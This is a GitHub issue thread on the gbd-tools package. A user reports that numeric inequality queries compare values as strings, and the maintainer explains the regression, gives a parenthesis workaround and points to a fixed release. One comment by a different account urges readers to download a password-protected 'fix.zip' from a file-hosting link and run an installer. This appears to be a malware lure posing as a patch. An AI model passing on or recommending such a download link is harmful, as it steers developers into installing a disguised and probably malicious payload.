### ISSUE TITLE
Numerical inequality comparisons not working

### ISSUE THREAD

**Issue by chrjabs** [Udopia/gbd#30]
Minimum reproducible example of the issue:
```bash
python -m venv testvenv > /dev/null
source testvenv/bin/activate > /dev/null
pip install gbd-tools > /dev/null 2> /dev/null
echo "hash,value" > test.csv
echo "abc,5" >> test.csv
echo "cde,42" >> test.csv
gbd -d test.csv get "value > 10" 2> /dev/null
# Prints the following two lines
# > abc
# > cde
gbd -d test.csv:sql.db create --target sql value2
gbd -d test.csv:sql.db set value2=5 --hashes=abc
gbd -d test.csv:sql.db set value2=42 --hashes=cde
gbd -d test.csv:sql.db get "value2 > 10" 2> /dev/null
# Again, prints the following two lines
# > abc
# > cde
```
I first thought this issue was only limited to CSV input, but this seems not to be the case. It looks a bit like a lexicographic string comparison is performed rather than a numeric one.
On https://benchmark-database.de I can't reproduce the issue, is that running an older version?

<details>
<summary>Details of environment</summary>

```bash
~ [🐍 v3.12.4(testvenv)]
❯ python --version
Python 3.12.4

~ [🐍 v3.12.4(testvenv)]
❯ pip list --local
Package         Version
--------------- -----------
blinker         1.8.2
click           8.1.7
Flask           3.0.3
gbd-tools       4.9.1
gbdc            0.2.45
itsdangerous    2.2.0
Jinja2          3.1.4
MarkupSafe      2.1.5
numpy           2.1.0
pandas          2.2.2
Pebble          5.0.7
pip             24.0
python-dateutil 2.9.0.post0
pytz            2024.1
six             1.16.0
TatSu           5.12.1
tzdata          2024.1
waitress        3.0.0
Werkzeug        3.0.4
```

</details>

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Udopia** [comment]
Thanks for pointing out this regression. Must have come in while I was cleaning up the EBNF. Now numbers are interpreted as strings by default and that breaks some comparisons in queries. 

Until this is fixed, here is a workaround: put the numbers you in parentheses to force the parser to interpret it as an arithmetic expression. Then it is definitely a comparison against a number.

**Comment by Udopia** [comment]
Should be fixed by commit ec197d5 and on PyPI with version 4.9.2
